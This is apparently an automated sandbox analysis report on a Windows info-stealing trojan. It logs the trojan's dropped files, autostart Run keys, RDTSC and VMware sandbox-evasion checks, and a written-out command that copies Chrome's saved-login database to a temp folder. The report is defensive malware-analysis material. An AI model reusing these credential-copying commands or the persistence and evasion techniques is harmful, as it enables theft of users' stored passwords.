            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C199A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C197A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C196E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C195D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C1A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C199D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C198F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C198A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C1B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C1A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C1A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C196D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19650 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19660 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C195F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C1AD30 NtSetContextThread,
            Source: TR0627729920002.exe, 00000000.00000002.277070452.0000000002930000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000002.278345155.000000007FCF5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.257799024.0000000003BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000002.277410487.00000000034A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.237403790.000000007FCD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.237626468.000000007FC97000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000002.279158959.000000007FE68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.239679096.00000000035D8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.239608511.0000000003544000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exeBinary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Jwjxmakrv.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: IconCachet0hh.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: IconCachet0hh.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: IconCachet0hh.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\TR0627729920002.exeSection loaded: system.dll
            Source: C:\Users\user\Desktop\TR0627729920002.exeSection loaded: system.dll
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeSection loaded: system.dll
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeSection loaded: system.dll
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeSection loaded: system.dll
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeSection loaded: system.dll
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe 3685495D051137B1C4EFDE22C26DF0883614B6453B762FA84588DA55ED2E7744
            Source: TR0627729920002.exeReversingLabs: Detection: 29%
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile read: C:\Users\user\Desktop\TR0627729920002.exeJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\TR0627729920002.exe "C:\Users\user\Desktop\TR0627729920002.exe"
            Source: C:\Users\user\Desktop\TR0627729920002.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe"
            Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe"
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
            Source: C:\Program Files (x86)\P1bxx\IconCachet0hh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\TR0627729920002.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe"
            Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: C:\Users\user\Desktop\TR0627729920002.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B091E540-83E3-11CF-A713-0020AFD79762}\InProcServer32
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Jwjxmakrvkwfuijrnbpqlslhsyeopao[1]Jump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\P1bxxJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@23/8@36/13
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Desktop\TR0627729920002.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
            Source: Binary string: wntdll.pdb source: cmd.exe, cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: cmd.pdb source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035B8007 push sp; iretd
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF45C pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF45C pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0059 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0059 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0059 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0452 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0452 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0452 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF145 pushfd ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF145 pushfd ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF37A pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF37A pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0773 push FFFFFFD3h; ret
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0773 push FFFFFFD3h; ret
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0773 push FFFFFFD3h; ret
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF416 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF416 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0012 push esp; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0012 push esp; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D0012 push esp; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF707 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF707 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D083E push FFFFFFBDh; ret
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D083E push FFFFFFBDh; ret
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D083E push FFFFFFBDh; ret
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CFFDD pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CFFDD pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF8D7 push esp; ret
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035CF8D7 push esp; ret
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D06C5 push ecx; retf
            Source: IconCachet0hh.exe.7.drStatic PE information: section name: .didat
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exeJump to dropped file
            Source: C:\Users\user\Desktop\TR0627729920002.exeFile created: C:\Users\Public\Libraries\Jwjxmakrv.exeJump to dropped file

            Boot Survival

            barindex
            Creates multiple autostart registry keys
            Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
            Source: C:\Users\user\Desktop\TR0627729920002.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JwjxmakrvJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JwjxmakrvJump to behavior
            Source: C:\Users\user\Desktop\TR0627729920002.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JwjxmakrvJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
            Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\TR0627729920002.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\TR0627729920002.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000050418C04 second address: 0000000050418C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000050418F9E second address: 0000000050418FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000948C04 second address: 0000000000948C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000948F9E second address: 0000000000948FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\explorer.exe TID: 5744Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D083E rdtsc
            Source: C:\Windows\SysWOW64\cmd.exeAPI coverage: 5.0 %
            Source: C:\Users\user\Desktop\TR0627729920002.exeProcess information queried: ProcessInformation
            Source: explorer.exe, 00000007.00000000.389287152.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
            Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
            Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
            Source: explorer.exe, 00000007.00000000.318850727.0000000008290000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
